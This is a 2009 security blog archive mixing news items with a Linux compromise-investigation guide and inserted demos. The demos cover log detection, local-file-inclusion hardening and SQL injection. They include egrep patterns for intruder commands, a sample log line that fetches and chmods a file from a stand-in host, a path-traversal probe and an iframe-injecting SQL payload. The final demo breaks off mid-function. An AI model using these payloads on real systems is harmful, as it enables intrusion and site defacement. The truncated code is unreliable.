Computerworld - More than 50 people in Southern California, Las Vegas and Charlotte, N.C., were indicted by a grand jury in Los Angeles for scheming to steal bank account information from thousands of people in the U.S. using phishing techniques.
U.S. authorities today arrested 33 of those named in the indictments and are on the lookout for the other 20.
In addition, authorities in Egypt charged another 47 co-conspirators in connection with the same scheme, bringing the total number of people charged to 100 -- the largest number of defendants ever charged for the same cybercrime, according to the FBI.
The indictments stem from a two-year operation dubbed "Phish Phry," which involved the FBI, the U.S. Attorney's Office, the Electronic Crimes Task Force in Los Angeles and Egyptian law enforcement authorities.
The arrests were announced in Los Angeles by Keith Bolcar, acting assistant director in charge of the FBI in Los Angeles, George Cardona, acting U.S. Attorney in Los Angeles, and Egyptian law enforcement authorities.
The 51-count indictment, which was unsealed today, accused all of the defendants with conspiracy to commit wire fraud and bank fraud. Some of those named were also charged with aggravated identity theft, unauthorized access to protected computers and money laundering.
Phishing is a form of social engineering in which attackers send e-mails made to look like legitimate correspondence from reputable institutions such as banks. Victims are directed to Web sites that look authentic but are actually fakes. Once there, they are asked to enter information that can later be used to break into accounts or to commit identity theft.
According to the indictment, hackers in Egypt used phishing techniques to obtain bank account numbers and related personal data from thousands of bank customers in the U.S. The information was then used to break into customer accounts at two U.S. banks, Bank of America and Wells Fargo.
The Egyptian hackers then recruited individuals in the U.S. to help transfer funds from the compromised accounts to newly created accounts. The U.S. part of the crime ring was allegedly managed by Kenneth Lucas, Nichole Merzi and Jonathan Clark, all of whom are residents of California, the FBI said in a statement.
The three individuals are alleged to have directed associates to recruit "runners" to establish bank accounts to which funds stolen from the compromised accounts could be transferred. A portion of the funds was wired to the conspirators in Egypt.
The alleged conspirators typically withdrew amounts ranging from a few hundred dollars to more than $2,000 from compromised bank accounts and then transferred the money into the new accounts.
"The sophistication with which Phish Phry defendants operated represents an evolving and troubling paradigm in the way identity theft is now committed," Bolcar said in a statement. The operations of the group had a significant impact on the operations of two banks and caused "huge headaches" for the victims, the statement added.
All of the individuals charged in the U.S. face prison terms of up to 20 years if they are convicted.
John Harrison, a group product manager for security vendor Symantec Corp., said the arrests highlight the truly global nature of phishing operations. Despite heightened awareness of the problem, phishing schemes continue to thrive on the Internet, he said.
Last year, Symantec counted more than 55,000 phishing sites. That figure represented an increase of more than 60% from 2007 levels, Harrison said. The growing availability of sophisticated phishing tool kits is adding to the problem by making it much simpler for would-be phishers to create spoofed Web sites that can be used to trick victims into parting with confidential information, he said.
Thursday, October 08, 2009
Static Binary Analysis of Recent SMBv2 Vulnerability
The recent SMBv2 vulnerability (CVE-2009-3103) in Microsoft Windows has gotten a lot of attention in the past few weeks. We decided that given the publicity and nature of the vulnerability, it would be interesting to post a threat analysis. With the release of Stephen Fewer's Metasploit module to exploit this vulnerability, technical details of the vulnerability are now publicly available.
Details: http://www.secureworks.com/research/threats/windows-0day/?threat=windows-0day
Sunday, October 04, 2009
File Carving and File Recovery with DiskDigger
DiskDigger is a tool that allows you to recover deleted files from a FAT or NTFS drive. It has two modes of operation: in the first it merely looks in the FAT/MFT for files marked as deleted, in much the same way that the tool called Restoration does. In the second mode it carves down the drive, looking at the raw bits for the known headers and footers of various file types, much like PhotoRec. While PhotoRec seems a little more powerful, DiskDigger is easier to use and its preview functionality is quite nice. This video covers the basics of recovering deleted files with DiskDigger.
See this video:
http://www.irongeek.com/videos/file-carving-and-file-recovery-with-diskdigger.swf
Saturday, October 03, 2009
FOSS.my 2009 (24-25 October 2009)
FOSS.my 2009 is Malaysia's premier Free and Open Source Software (FOSS) event. It is our second such conference; we aim for it to be an annual event bringing together professionals and enthusiasts from Malaysia, Singapore, Asia and the rest of the world for a two-day, grassroots-driven FOSS conference.
http://foss.my/2009/schedule/
Monday, September 14, 2009
NSMnow – 1.5.0
The NSMnow 1.5 series sees the initial completed feature set for Fedora, RHEL and CentOS systems. This is excellent news for those who have wanted to have, use or test an NSM configuration for themselves but were daunted by the process of building one from scratch.
With this being the initial release supporting Fedora, RHEL and CentOS systems, there are bound to be some teething problems. As long as you submit bug reports, we will fix them and NSMnow will continue to get even better, if that's possible.
Download: http://www.securixlive.com/nsmnow/download.php
iPhone anti-phishing sigs only slightly delayed
A number of security experts initially criticized Apple's latest security feature for the iPhone, only to find -- 24 hours later -- that the issues were mostly moot.
On Thursday, Apple highlighted the anti-phishing features of its popular mobile device, the iPhone, at a San Francisco product launch event. However, several security experts tested the feature only to find that phishing sites blocked by Safari were still loaded by the iPhone's mobile browser. Yet, by Friday, the issue appeared to have been mostly fixed.
It's likely that the lists of sites to be blocked had to be updated by Apple, and that took time, said Michael Sutton, vice president of security research for Web security firm Zscaler.
"Over time, more sites are being blocked," Sutton said. "The issue is likely not the blocking, but the updates."
On Saturday, Apple confirmed that updates to the iPhone are not necessarily in real time.
"Safari's anti-phishing database is downloaded while the user charges their phone in order to protect battery life and ensure there aren't any additional data fees," the company said in a statement sent to SecurityFocus. "After updating to iPhone OS 3.1 the user should launch Safari, connect to a Wi-Fi network and charge their iPhone with the screen off. For most users this process should happen automatically when they charge their phone."
Sutton commended Apple for its attention to security on the iPhone.
"If you look at mobile phones, they have very little security," he said. "So it's good that Apple has taken this step."
From: SecurityFocus
Sunday, September 13, 2009
Hack In The Box Security Conference 2009 - Malaysia
Date: 5-8 October 2009
Venue: Crowne Plaza Mutiara Kuala Lumpur, Jalan Sultan Ismail, 50250 Kuala Lumpur
HITBSecConf is the premier network security event in Asia and the Middle East. The main aim of our conference is to enable the dissemination, discussion and sharing of deep-knowledge network security information.
You can see details here:
http://conference.hitb.org/hitbsecconf2009kl/
Thursday, September 10, 2009
Hackers already exploiting IIS flaws
Microsoft has revealed that hackers are already exploiting newly disclosed vulnerabilities in its Internet Information Services (IIS) web server software.
Exploit code for the first flaw was posted on Monday, allowing hackers to remotely take control of an IIS 5.0 server. New code was then posted on Thursday which takes advantage of vulnerabilities in IIS 5.0, IIS 5.1, IIS 6.0 and IIS 7.0 to allow hackers to launch denial-of-service attacks against these systems, as long as they are running the FTP Service, said Microsoft.
The company was forced to update its security advisory warning that it is now seeing "limited attacks that use this exploit code".
"Microsoft is actively monitoring this situation to keep customers informed and to provide guidance as necessary," the advisory continued.
Microsoft is due to release its September security updates on Tuesday next week, but it is widely believed that the new vulnerabilities were disclosed too recently for the Microsoft security team to deliver a working fix.
Microsoft blamed the current, albeit limited, attacks on the fact that the original vulnerabilities were published on the internet before the firm had a chance to work on a resolution.
"We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests," said the firm in a blog post.
"This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed."
How to Investigate a compromised Linux Server
This article will assist you with a preliminary investigation of a server compromise. If the server appears to have been compromised at the root level, the server is to be considered compromised until it is rebuilt. This is not to say that you have to rebuild just because an intruder gained access to an unprivileged account. You must identify how the server was compromised, so you can patch those areas.
Note: Don't get distracted by what you find; focus on gathering as much information as possible before disturbing the environment.
Identify Who is on the Server
Look for suspicious logins. If the customer always logs in from a DSL line in California and then suddenly logs in from Japan, you may want to make note of that.
#w && echo "netstat listing" && netstat -nalp |grep ":22 "
#last -a
#zgrep ssh /var/log/secure* |grep Accept
#zgrep ftp /var/log/secure* |grep Accept
Identify current network activity:
#netstat -nalp
View IP Connection Count
The following command will tell you how many connections are being made to the webserver on port 80.
Replacing :80 with the port of your application will allow you to see the number of connections associated with any service. If you are using IPv6, replace cut -f1 -d: with cut -f4 -d:
#netstat -plant | awk '$4 ~ /:80$/ {print $5}' | \
#cut -f1 -d: | \
#sort | uniq -c | sort -n
1 0.0.0.0
1 127.0.0.1
1 149.254.192.205
1 151.65.171.19
1 165.155.200.87
1 173.66.139.70
1 195.93.21.97
1 60.48.171.251
1 60.53.227.174
1 72.30.142.83
1 75.101.147.30
1 79.7.248.51
1 82.206.136.38
1 83.229.112.20
1 96.231.93.237
2 202.133.102.242
2 41.210.38.158
2 86.16.94.89
3 208.54.94.9
5 41.210.17.188
5 41.210.35.165
5 66.150.96.121
5 83.87.69.25
9 68.191.207.0
11 65.49.2.92
What is the state of the current connections?
#netstat -plant | \
#awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
13 FIN_WAIT2
53 LISTEN
129 TIME_WAIT
316 ESTABLISHED
754 CLOSE_WAIT
Connection state and process name:
#netstat -plant | \
#awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' | \
#sort | uniq -c | sort -n| tail
1 LISTEN xinetd
2 LISTEN memcached
2 LISTEN slapd
2 LISTEN smbd
2 TIME_WAIT
3 LISTEN httpd
3 SYN_SENT firefox
9 ESTABLISHED httpd
11 ESTABLISHED firefox
46 ESTABLISHED slapd
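As an added example (not from the original article), the same counting as the netstat pipelines above, written as shell functions that read netstat -plant output from stdin. They strip only the trailing :port from the foreign address, so IPv6 and IPv4-mapped peers are counted correctly without swapping cut -f1 for cut -f4, and a third function picks out the peers holding the most sockets. The sample output is constructed, not captured from a real server.

```shell
#!/bin/sh
# Constructed sample in "netstat -plant" layout (not captured from a real server).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1234/httpd
tcp        0      0 10.0.0.5:80             203.0.113.7:51000       ESTABLISHED 1240/httpd
tcp        0      0 10.0.0.5:80             203.0.113.7:51001       ESTABLISHED 1241/httpd
tcp        0      0 10.0.0.5:80             198.51.100.9:40022      TIME_WAIT   -
tcp        0      0 10.0.0.5:22             198.51.100.9:40100      ESTABLISHED 900/sshd
tcp6       0      0 :::80                   :::*                    LISTEN      1234/httpd
tcp6       0      0 2001:db8::5:80          2001:db8:1::9:55000     ESTABLISHED 1242/httpd
tcp6       0      0 ::ffff:10.0.0.5:80      ::ffff:203.0.113.7:52000 CLOSE_WAIT  1243/httpd'

# Peers connected to local port $1, counted per remote address.
# Only the trailing ":port" is removed, so "2001:db8:1::9" stays whole.
# Listening sockets are skipped: their foreign address "0.0.0.0:*" is not a peer.
peers_by_port() {
    awk -v p="$1" '
        /^tcp/ && $4 ~ (":" p "$") && $6 != "LISTEN" {
            addr = $5
            sub(/:[0-9*]+$/, "", addr)
            print addr
        }' | sort | uniq -c | sort -n
}

# Connection state per program, as in the article; sockets with no PID
# (shown by netstat as "-") are labelled instead of printed with an empty name.
state_by_program() {
    awk '
        /^tcp/ {
            n = split($7, a, "/")
            prog = (n > 1) ? a[2] : "(no pid)"
            print $6, prog
        }' | sort | uniq -c | sort -n
}

# Peers with at least $2 connections to port $1: a quick way to spot the
# one address holding many sockets open to a service.
busy_peers() {
    peers_by_port "$1" | awk -v t="$2" '$1 >= t { print $2 }'
}

printf '%s\n' "$SAMPLE_NETSTAT" | peers_by_port 80
printf '%s\n' "$SAMPLE_NETSTAT" | state_by_program
```

On a live server, pipe the real output in with `netstat -plant | peers_by_port 80`.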
List Open Files
In Linux everything is a file, including network connections:
#lsof -i -n
To view the numeric port number instead of the service name:
#lsof -nPi
What Processes are Running?
#ps -elf
#ls /proc/*/exe -la
Unhide
Sometimes processes will hide themselves well enough that the shell commands above won't pick them up. In these instances, use unhide:
http://www.security-projects.com/?Unhide
Compile Unhide:
$ wget http://www.security-projects.com/unhide20080519.tgz
$ tar xzf unhide20080519.tgz
$ cd unhide-20080519/
$ cc unhide-tcp.c -o unhide-tcp
$ chmod o+x unhide-tcp
$ cc unhide-linux26.c -o unhide
$ chmod o+x unhide
$ mv unhide* /usr/sbin
Using Unhide:
$ unhide-tcp
Unhide 20080519
yjesus@security-projects.com
Starting TCP checking
Starting UDP checking
$ unhide proc
Unhide 20080519
yjesus@security-projects.com
[*]Searching for Hidden processes through /proc scanning
Found HIDDEN PID: 740
Command:
Found HIDDEN PID: 775
Command:
Found HIDDEN PID: 1004
Command:
Found HIDDEN PID: 2996
Command:
Found HIDDEN PID: 26921
Command: ./123qwelb
Found HIDDEN PID: 27109
Command: ./123qwelb
Found HIDDEN PID: 27213
Command: ./123qwelb
Found HIDDEN PID: 27216
Command: ./123qwelb
Found HIDDEN PID: 27284
Command: top
Check Binary Files
Oftentimes malicious users will replace system binaries with modified copies that leave backdoors for the attacker to use in the event that the original attack vector is corrected.
You can use the strings command to view the text data in a binary file. As such, you can use it as one way to determine whether a binary has been modified.
Compare the output of the following command with that of a known good server:
#strings /usr/bin/top
Investigate Process Activity
Want to see what a process is doing? Run the following command, replacing $PID with the actual process id:
#strace -p $PID
From the strace man page (DESCRIPTION):
In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls which are called by a process and the signals which are received by a process. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option.
The -p flag allows you to attach strace to an already running process.
Suspicious Files
Are suspicious files located in the world writeable directories?
The next thing you want to look at are the directories that are world writeable. More often than not, the intruder is not a hacker at all, but a worm that is spreading through the internet. Many attacks will store a binary or will leave behind other temporary files. The three most common directories to search in are /tmp, /var/tmp, and /dev/shm.
#ls /tmp -lab
#ls /var/tmp -lab
#ls /dev/shm -lab
Many times you will find that the worm/intruder will try to hide subdirectories in ways that make it hard to find how to enter the directory. Using the tab key for the auto-complete often helps. Here are some examples of what to look for:
root:~# ls -la
total 2
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32
drwxr-xr-x 5 nobody nobody 120 2005-11-25 18:32 .
drwxr-xr-x 33 nobody nobody 2320 2005-11-25 18:31 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:31 ...
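An added example, not part of the original article, that automates the two checks above for a scratch directory: entries whose names are built only from dots or contain blanks or control characters (the "..." and " " tricks in the listing), and executable files dropped there. The functions take any path; the directory names in check_scratch_dirs are the three the article lists, and -mindepth/-maxdepth are assumed to be available (GNU or BSD find).

```shell
#!/bin/sh
# Flag directory entries whose names are easy to overlook in "ls -la":
# names containing blanks or control characters, and names made only of dots.
# Assumes GNU/BSD find (-mindepth/-maxdepth); entries with a newline in the
# name are not handled by the read loop.
odd_names() {
    find "$1" -mindepth 1 -maxdepth 1 -print | while IFS= read -r path; do
        name=${path##*/}
        if printf '%s' "$name" | grep -q '[^[:graph:]]'; then
            reason='blank or control character in name'
        elif [ -z "$(printf '%s' "$name" | tr -d '.')" ]; then
            reason='name made only of dots'
        else
            continue
        fi
        # Quote the name so trailing blanks are visible, much as "ls -b" shows them.
        printf '%s: "%s" (%s)\n' "$reason" "$name" "$path"
    done
}

# Regular files with the owner-execute bit set: a dropped binary is the most
# common thing left behind in /tmp, /var/tmp or /dev/shm.
executables_in() {
    find "$1" -type f -perm -0100 -print
}

# Run both checks over the three directories the article names.
check_scratch_dirs() {
    for d in /tmp /var/tmp /dev/shm; do
        [ -d "$d" ] || continue
        odd_names "$d"
        executables_in "$d"
    done
}

# Scan the real directories only when asked, so the functions can be sourced.
if [ "${1:-}" = "--scan" ]; then
    check_scratch_dirs
fi
```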
Point(s) of Entry
Simply cleaning a server will not prevent a future compromise. We need to help the customer identify the point of entry to protect the customer, and our network.
Many times vulnerable web scripts (PHP, Perl, etc.) are exploited and commands are then executed on the server as the web user. Use grep to search the Apache logs for some common commands that are often used by intruders.
You will want to use different commands depending on what control panel software the server is running.
No control panel
for i in `locate access_log` ;
do
echo $i ; egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' $i ;
done
You may have to look in the customer's VirtualHost container to ascertain the real name of the log file.
cPanel
The following code will check if any system functions were called using the webserver:
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /usr/local/apache/logs/*
The next command searches for XSS vulnerabilities (with the added benefit of searching for positive HTTP status codes):
awk '$7 ~ /http/ {print}' /usr/local/apache/domlogs/*/access_log | awk '$9 ~ /[2-3]/ {print}'
Ensim
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /home/virtual/site*/fst/var/log/httpd/*
Plesk
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/*/statistics/logs/*
On servers with a large number of sites, running the previous command will give you an "argument list too long" error. Try this instead:
for i in `ls /var/www/vhosts`; do
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/$i/statistics/logs/access_*log 2>/dev/null;
done;
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/log/httpd/*
To locate XSS vulnerabilities try:
awk '$7 ~ /http/ {print}' /var/www/vhosts/*/statistics/logs/access_*log | awk '$9 ~ /[2-3]/ {print}'
This command searches the URI string for the text http. URIs with a protocol identifier in them often indicate an XSS attack. However, some applications such as WordPress, among others, can produce false positives. Additionally, this command only returns results for requests with a positive reply code, indicating a successful request to the web server.
Reminders
Keep in mind that not all results mean the server has been compromised; it takes some interpreting. You want to look for obvious things such as calls to wget to download a file, or a call to perl that looks out of place. You may come up with some false positives, so using grep to cut 404s and 400s out may be a good idea. You can do this by tacking a "| grep -v 404" on to the end of any of those commands.
Document all of your findings!
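An added example, not from the original article, that wraps the log checks from Point(s) of Entry and Reminders into shell functions run over constructed Apache combined-format lines: the command-indicator grep with 4xx responses dropped by status field rather than by grepping out the text 404, the protocol-identifier check tightened to :// and a 2xx/3xx status, and a find-based scan that avoids the argument-list-too-long error on large vhost trees. The log lines, addresses and paths are made up.

```shell
#!/bin/sh
# Constructed Apache combined-format lines (not from a real server). Field 7 is
# the request URI and field 9 the status code, the positions the awk one-liners use.
SAMPLE_LOG='203.0.113.7 - - [10/Sep/2009:10:01:02 +0800] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Sep/2009:10:01:05 +0800] "GET /index.php?page=http://198.51.100.9/x.txt HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Sep/2009:10:02:11 +0800] "GET /cgi-bin/test.cgi?cmd=wget%20http://198.51.100.9/a;chmod%20755%20a HTTP/1.1" 200 77 "-" "curl/7.19"
198.51.100.9 - - [10/Sep/2009:10:02:15 +0800] "GET /shell.php?c=system(ls) HTTP/1.1" 404 300 "-" "curl/7.19"
192.0.2.4 - - [10/Sep/2009:10:03:00 +0800] "GET /wp-admin/post.php?url=http://example.com/ref HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

# The command-indicator pattern from the article, unchanged.
PATTERN='(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20'

# Requests matching the pattern whose status is not 4xx. Filtering on field 9
# keeps a "404" inside the URI or byte count from hiding a hit, unlike "grep -v 404".
suspicious_commands() {
    grep -E -i "$PATTERN" | awk '$9 !~ /^4/'
}

# URIs carrying a full URL that were answered 2xx/3xx. "://" is tighter than
# the plain /http/ test, and ^[23] avoids matching a 403 or 423 on a stray digit.
# WordPress-style referrer parameters still show up, as the article warns.
uri_with_url() {
    awk '$7 ~ /:\/\// && $9 ~ /^[23]/'
}

# Scan every access log under a vhost tree. find hands grep the file names in
# batches, so a thousand sites do not overflow the command line; the extra
# /dev/null argument makes grep prefix each hit with its file name.
scan_logs_dir() {
    find "$1" -type f -name 'access_*log*' \
        -exec grep -E -i "$PATTERN" /dev/null {} +
}

printf '%s\n' "$SAMPLE_LOG" | suspicious_commands
printf '%s\n' "$SAMPLE_LOG" | uri_with_url
```

On a Plesk server the tree argument would be /var/www/vhosts; results still need the interpretation the Reminders section describes.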
Wrap Up
Root Compromise
If you determine that an attacker has gained root access, you will need to contact your sales representative to have a replacement server built. There is no way for you to guarantee that a server will be 100% safe after a root compromise.
Ideally you should upload your sites to the new server from a local backup; however, you can attempt to clean up the sites as best you can if local backups are not available.
User Compromise
If your investigation determines that the server was not compromised at the root level, then it should be safe to remove the compromised files, if any, and inform the customer of your findings, along with recommendations to prevent this issue from recurring.
From: http://neranjara.org/article/title/How_to_Investigate_a_compromised_Linux_Server
Wednesday, September 09, 2009
Vista/2008/Windows 7 SMB2 BSOD 0Day
This vulnerability in Microsoft SMB2 can be triggered remotely to crash the system, and proof-of-concept code has been published. It affects Windows 7/Vista/Server 2008. The exploit needs no authentication, only file sharing enabled, and a single packet is enough to cause a BSOD. We recommend filtering access to TCP port 445 with a firewall.
More details, http://milw0rm.com/exploits/9594
Friday, September 04, 2009
Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service
There is a DoS vulnerability in the globbing functionality of the IIS FTP server.
Anonymous users can exploit it if they have read access to a directory, and normal users can exploit it if they can read a directory.
The exploit steps are here:
http://www.milw0rm.com/exploits/9587
fimap-A little tool for local and remote file inclusion auditing and exploitation
fimap is a little Python tool which can find, prepare, scan, audit, exploit and even Google automatically for local and remote file inclusion bugs in web apps. fimap should be something like sqlmap, just for LFI/RFI bugs instead of SQL injection. It is currently under heavy development but usable. Feel free to test it!
This document and tool are not recommended for people who don't know what LFI/RFI is. If you do know, it might be a handy tool for you.
You can download it here:
http://code.google.com/p/fimap/downloads/list
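To make the LFI/RFI bug class concrete, here is an added Python example (written for this page, not fimap's code): an include routine that trusts the page name the way include($_GET['page']) does, a hardened version with the checks a reviewer would expect, and the kind of probe an LFI scanner runs, a traversal payload followed by a search for a marker from a file that must never be served. The directory layout, file names and the "db_password=" marker are constructed for the example.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit


class IncludeRejected(ValueError):
    """Raised by safe_include when the requested page fails a check."""


def build_fixture():
    """Constructed fixture: a 'pages' directory the application may include from,
    and a secret file one level above it that must stay unreachable."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    with open(os.path.join(pages, "home.php"), "w") as f:
        f.write("<h1>home</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("db_password=hunter2")
    return pages


def vulnerable_include(base_dir, page):
    """Mirrors include($_GET['page']): the user controls the whole path.
    '../' walks out of base_dir, os.path.join() drops base_dir entirely if
    page is absolute, and PHP with allow_url_include would fetch a URL here."""
    with open(os.path.join(base_dir, page)) as f:
        return f.read()


# Allowlist: letters, digits, '_' and '-' only. No '/', '.', '%', NUL or ':'.
PAGE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def safe_include(base_dir, page):
    # 1. No URLs or stream wrappers (http://, ftp://, php://filter, data:).
    if urlsplit(page).scheme or "://" in page:
        raise IncludeRejected("remote or wrapper scheme")
    # 2. Strict allowlist on the name itself; this alone stops '../' and NUL bytes.
    if not PAGE_NAME.match(page):
        raise IncludeRejected("page name outside allowlist")
    # 3. Defence in depth: canonicalise and confirm the target is still under base_dir
    #    (catches symlinks or a future loosening of the allowlist).
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected("resolved path escapes base directory")
    if not os.path.isfile(target):
        raise IncludeRejected("no such page")
    with open(target) as f:
        return f.read()


def rejected(base_dir, page):
    """True if safe_include refuses the page (used to exercise the checks)."""
    try:
        safe_include(base_dir, page)
    except IncludeRejected:
        return True
    return False


def looks_vulnerable(include_fn, base_dir):
    """The scanner's decision: send a traversal payload and look for a marker
    that only appears in a file the application should never serve."""
    try:
        return "db_password=" in include_fn(base_dir, "../secret.txt")
    except (IncludeRejected, OSError, ValueError):
        return False


if __name__ == "__main__":
    pages = build_fixture()
    print("vulnerable_include:", looks_vulnerable(vulnerable_include, pages))  # True
    print("safe_include:      ", looks_vulnerable(safe_include, pages))        # False
```

The allowlist is the control that actually matters; the realpath check is there so that a later "small" relaxation of the regex (say, allowing '/' for sub-directories) does not silently reopen traversal.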
Monday, August 31, 2009
Indonesian Hackers Launch Independence Day Attack on Malaysian Web Sites
A ring of Indonesian hackers on Monday claimed to have attacked a list of more than 120 Web sites as retribution for Malaysia’s alleged theft of Indonesian cultural items and abuse of migrant workers.
A statement was posted on a Blogspot blog titled "Terselubung" saying that a number of Malaysian Web sites had been hacked and defaced to “celebrate” Malaysia’s Independence Day, which fell on Monday August 31.
“Today, August 31, 2009, an uncreative country, a country who likes to steal Indonesian culture, a country whose citizen is the mastermind of bombings in Indonesia, a country who has tortured many of our sisters — the migrant workers who worked there, a country who abused our national anthem, a country who harassed Indonesia on the Internet, a country that has stolen Sipadan and Ligitan islands, a country which has trespassed our water illegally, a country which received their independence from Britain, is celebrating its anniversary,” the Web site stated.
From the HITB website.
The original post on the Terselubung blog is here:
http://terselubung.blogspot.com/2009/08/perang-online-dengan-malaysia-di-mulai.html
Friday, August 28, 2009
DNSenum
DNSenum is a pentesting tool created to enumerate DNS information about domains.
The purpose of dnsenum is to gather as much information as possible about a domain. The program currently performs the following operations:
1) Get the host's address (A record).
2) Get the nameservers (threaded).
3) Get the MX records (threaded).
4) Perform AXFR (zone transfer) queries against the nameservers (threaded).
5) Get extra names and subdomains via Google scraping (Google query = "allinurl: -www site:domain").
6) Brute force subdomains from a file; can also recurse on subdomains that have NS records (all threaded).
7) Calculate the domain's class C network ranges and perform whois queries on them (threaded).
8) Perform reverse lookups on the netranges (class C and/or whois netranges) (threaded).
9) Write the IP blocks to the file domain_ips.txt.
Thursday, August 27, 2009
Hacking Exposed: Network Security Secrets and Solutions
I'm still reading this Hacking Exposed 6th Edition book. I hope I will finish it this week.
Hacking Exposed established this entire genre of books. Now in its 6th (and 10th anniversary) edition, having sold millions of copies throughout the world, the book remains the #1 best-selling computer security book in the world and is still just as useful and valuable as ever. Kurtz, McClure and Scambray have once again updated this highly respected title to include the latest attacks and exploits, as well as the cutting-edge countermeasures and security controls you can implement to protect your PC or your network.
New and updated material:
-New chapter on hacking hardware, including lock bumping, access card cloning, RFID hacks, USB U3 exploits, and Bluetooth device hijacking
-Updated Windows attacks and countermeasures, including new Vista and Server 2008 vulnerabilities and Metasploit exploits
-The latest UNIX Trojan and rootkit techniques and dangling pointer and input validation exploits
-New wireless and RFID security tools, including multilayered encryption and gateways
-All-new tracerouting and eavesdropping techniques used to target network hardware and Cisco devices
-Updated DoS, man-in-the-middle, DNS poisoning, and buffer overflow coverage
-VPN and VoIP exploits, including Google and TFTP tricks, SIP flooding, and IPsec hacking
-Fully updated chapters on hacking the Internet user, web hacking, and securing code
Table of contents
Part I: Casing the Establishment
Chapter 1. Footprinting
Chapter 2. Scanning
Chapter 3. Enumeration
Part II: System Hacking
Chapter 4. Hacking Windows
Chapter 5. Hacking Unix
Part III: Infrastructure Hacking
Chapter 6. Remote Connectivity and VoIP Hacking
Chapter 7. Network Devices
Chapter 8. Wireless Hacking
Chapter 9. Hacking Hardware
Part IV: Application and Data Hacking
Chapter 10. Hacking Code
Chapter 11. Web Hacking
Chapter 12. Hacking the Internet User
Part V: Appendixes
Appendix A. Ports
Appendix B. Top 14 Security Vulnerabilities
Appendix C. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attacks
Index
Auto SQL injection co-opts thousands of sites
An automated attack using SQL injection has compromised tens of thousands of Web pages with code that tries to upload a data-stealing Trojan horse program to visitors' computers, security firm ScanSafe said last week.
The attack, which had inserted iframe scripts into as many as 130,000 Web pages as of Tuesday, uses the compromised pages to attempt to infect visitors with a backdoor Trojan horse that includes keylogging and download functionality, Mary Landesman, senior security researcher for ScanSafe, said in an e-mail interview on Tuesday. The initial Web site compromises appear to have been accomplished through an automated database injection attack, which matches with a trend seen by Landesman and others.
"SQL injection attacks are the most commonly observed compromise vector," Landesman stated. "Web attacks have been growing at the rate of 1 percent per day over the past year, with over half of all observed attacks the result of SQL injection."
Web attacks using SQL injection have become a lot more popular in recent years. Last week, a federal indictment of an alleged data thief stated that all five corporate victims -- including Heartland Payment Systems and Hannaford Bros. -- had initially been compromised through an SQL injection attack. In 2008, about 20 percent of the 5,600 vulnerabilities entered into the National Vulnerability Database were related to SQL injection, according to the service's statistics page.
In the latest spate of attacks, the Trojan horse programs downloaded to compromised computers are poorly recognized by most security software, Landesman said.
"Signature detection ranges, with a high of roughly 50 percent of signature vendors detecting some of the malware and a low of less than 10 percent," she said. "The attackers are continually swapping domains, using multiple exploits, and swapping out the eventual malware binaries to ensure low detection rates from signature-based technologies."
This article is from SecurityFocus.com.
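The following is an added example (written for this page, not code from ScanSafe or SecurityFocus) of how one string-concatenated UPDATE turns a single editable field into the mass iframe insertion described above, placed next to the parameterised query that stops it. It runs against an in-memory SQLite table; the table layout, page contents and iframe URL are constructed for the example.

```python
import sqlite3

# Constructed demo content; table name, columns and iframe URL are assumptions.
IFRAME = '<iframe src="http://malicious.example/x.html" width="0" height="0"></iframe>'

# What an attacker submits as the "body" of the one page they may edit. Inside the
# concatenated UPDATE it closes the string literal, rewrites the SET clause to append
# the iframe to each row's existing body (so the site still looks normal), widens
# WHERE to every row, and comments out the original WHERE with "--".
PAYLOAD = "' || body || '" + IFRAME + "' WHERE 1=1 --"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (title, body) VALUES (?, ?)",
        [("Home", "<p>Welcome</p>"), ("About", "<p>About us</p>"), ("Contact", "<p>Email us</p>")],
    )
    conn.commit()
    return conn


def update_body_vulnerable(conn, page_id, new_body):
    """String concatenation: user input becomes part of the SQL statement.
    Note the id is injectable too ("3 OR 1=1"); the body is just the field
    the attacker in this example controls. Returns the SQL that ran."""
    sql = "UPDATE pages SET body = '" + new_body + "' WHERE id = " + str(page_id)
    conn.execute(sql)        # one statement is enough; no stacked queries needed
    conn.commit()
    return sql


def update_body_safe(conn, page_id, new_body):
    """Parameterised: the driver sends new_body as a value, never as SQL text."""
    conn.execute("UPDATE pages SET body = ? WHERE id = ?", (new_body, int(page_id)))
    conn.commit()


def infected_page_ids(conn):
    """Ids of pages whose body now ends with the injected iframe."""
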